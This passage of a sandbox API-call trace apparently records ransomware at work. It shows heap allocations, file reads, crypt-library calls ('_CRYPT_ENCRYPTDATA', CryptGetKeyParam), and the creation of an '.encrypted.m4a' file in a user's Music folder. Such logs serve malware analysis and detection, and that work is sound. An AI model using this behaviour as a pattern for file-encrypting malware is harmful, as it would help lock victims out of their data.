returned 0 [0037.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0037.833] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0037.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0037.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0037.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0037.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0037.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0037.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0037.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0037.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0037.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0037.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0037.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0037.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0037.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0037.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0037.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0037.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0037.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0037.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0037.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0037.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0037.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0037.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0037.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0037.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0037.834] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0037.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0037.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0037.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa0) returned 0x7d8558 [0037.834] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0037.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87aa40 [0037.834] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0037.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87a9d8 [0037.834] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d8558 | out: hHeap=0x770000) returned 1 [0037.834] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0037.834] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0037.834] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0037.834] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0037.834] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0037.834] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87aa40 | out: hHeap=0x770000) returned 1 [0037.835] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0037.835] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0037.835] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0037.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0037.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87aa40 [0037.835] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\7d68killni")) returned 0x10 [0037.835] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87aa40 | out: hHeap=0x770000) returned 1 [0037.835] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0037.835] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87a9d8 | out: hHeap=0x770000) returned 1 [0037.835] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0037.835] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0037.835] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0037.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0037.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab0010 [0037.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0037.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0037.835] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\z7Rh4U-493ioKt.encrypted.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\7d68killni\\z7rh4u-493iokt.encrypted.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0037.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0037.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0037.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0037.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0037.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0037.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0037.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0037.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0037.836] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0037.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0037.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0037.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0037.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0037.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0037.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0037.836] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0037.836] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0037.836] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0037.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0037.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0037.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0037.837] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0037.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0037.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0037.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0037.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0037.837] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0037.837] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0037.837] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x2ddd, lpOverlapped=0x0) returned 1 [0037.838] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0037.838] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.838] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0037.838] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0037.838] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0037.838] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0037.838] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0037.838] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x2ddd) returned 0xac0018 [0037.838] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.838] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0037.838] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0037.838] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0037.839] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0037.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0037.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0037.839] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0037.839] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0037.839] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0037.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0037.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0037.839] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0037.839] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0037.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0037.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0037.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0037.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0037.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0037.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0037.839] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0037.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0037.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0037.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0037.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0037.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0037.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0037.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0037.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0037.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0037.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0037.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0037.840] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0037.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0037.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0037.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0037.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0037.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0037.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0037.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0037.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0037.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0037.840] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0037.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0037.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0037.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0037.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0037.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0037.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0037.840] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.840] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0037.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0037.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0037.841] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0037.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0037.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0037.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0037.841] CryptGetKeyParam (in: hKey=0x7c21c0, dwParam=0x7, pbData=0x7da298, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da298*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0037.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0037.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0037.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0037.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0037.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0037.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0037.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0037.841] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0037.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0037.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0037.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0037.841] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0037.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0037.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0037.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0037.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0037.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae968 [0037.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0037.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0037.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0037.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0037.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0037.841] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0037.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0037.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0037.842] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0037.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0037.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0037.842] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.842] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.842] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0037.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0037.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0037.842] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0037.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b70 [0037.842] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0037.842] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0037.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0037.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0037.842] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0037.842] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0037.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0037.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0037.842] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.842] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0037.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0037.842] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0037.843] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0037.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0037.843] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0037.843] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0037.843] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0037.843] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0037.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0037.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0037.843] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.843] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.843] 